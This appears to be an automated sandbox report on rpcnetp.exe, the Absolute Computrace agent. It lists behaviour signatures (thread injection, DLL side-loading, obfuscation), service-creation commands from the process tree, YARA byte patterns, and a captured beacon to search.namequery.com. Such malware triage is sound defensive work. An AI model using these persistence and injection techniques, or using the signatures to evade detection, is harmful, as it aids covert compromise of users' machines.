Create Interactive Tour

Windows Analysis Report rpcnetp.exe

Overview

General Information

Sample Name:	rpcnetp.exe
Analysis ID:	499091
MD5:	57bd3200910a8d2c85b1927b27123a6b
SHA1:	bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256:	f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

DLL side loading technique detected

Sigma detected: Suspicious Svchost Process

Injects files into Windows application

Writes to foreign memory regions

Creates a thread in another existing process (thread injection)

Allocates memory in foreign processes

Uses 32bit PE files

Yara signature match

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Drops PE files

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6932 cmdline: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6984 cmdline: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' MD5: 24A3E2603E63BCB9695A2935D3B24695)

cmd.exe (PID: 7016 cmdline: cmd /c sc start EcVoz >> C:\servicestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 7056 cmdline: sc start EcVoz MD5: 24A3E2603E63BCB9695A2935D3B24695)

rpcnetp.exe (PID: 7072 cmdline: C:\Users\user\Desktop\rpcnetp.exe MD5: 57BD3200910A8D2C85B1927B27123A6B)

svchost.exe (PID: 7116 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

iexplore.exe (PID: 7148 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
rpcnetp.exe	PUP_ComputraceAgent	Absolute Computrace Agent Executable	ASERT - Arbor Networks (slightly modified by Florian Roth)	0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 0x64c:$b2: 54 61 67 49 64 00

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\rpcnetp.dll	PUP_ComputraceAgent	Absolute Computrace Agent Executable	ASERT - Arbor Networks (slightly modified by Florian Roth)	0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 0x64c:$b2: 54 61 67 49 64 00

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6932, ProcessCommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , ProcessId: 6984

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116

Jbx Signature Overview

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Desktop\rpcnetp.dll

Virustotal: Detection: 7%

Perma Link

Source: rpcnetp.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: rpcnetp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: iexplore.exe, 00000008.00000000.695874570.0000000003F0C000.00000004.00000010.sdmp

String found in binary or memory: http://search.namequery.com/

Source: unknown

HTTP traffic detected: POST / HTTP/1.1TagId: 0User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)Host: search.namequery.comContent-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: search.namequery.com

System Summary:

Source: rpcnetp.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: rpcnetp.exe, type: SAMPLE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.62.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.58.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.0.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.31.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.4.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.16.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.13.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.8.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.66.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.43.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.67.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.13.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.2.rpcnetp.exe.72b20000.1.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.0.rpcnetp.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.40.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.2.svchost.exe.72b20000.0.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.28.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.6.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.14.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.63.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.11.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.54.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.50.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.14.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.12.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.19.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.18.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.46.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.21.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.21.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.65.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.29.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.75.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.72.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.4.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.26.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.20.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.2.iexplore.exe.72b20000.0.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.5.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.76.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.19.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.71.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.47.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.51.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.29.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.17.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.35.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 6.2.rpcnetp.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.52.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.27.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.45.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.77.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.27.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.3.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.18.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.22.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.36.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.81.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.7.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.38.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.24.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.37.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.26.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.23.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.49.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.24.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.1.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.70.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.80.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.7.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.28.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.34.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.23.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.30.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.56.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.41.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.32.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.5.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.53.unpack, type: UNPACKEDPE	Matched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
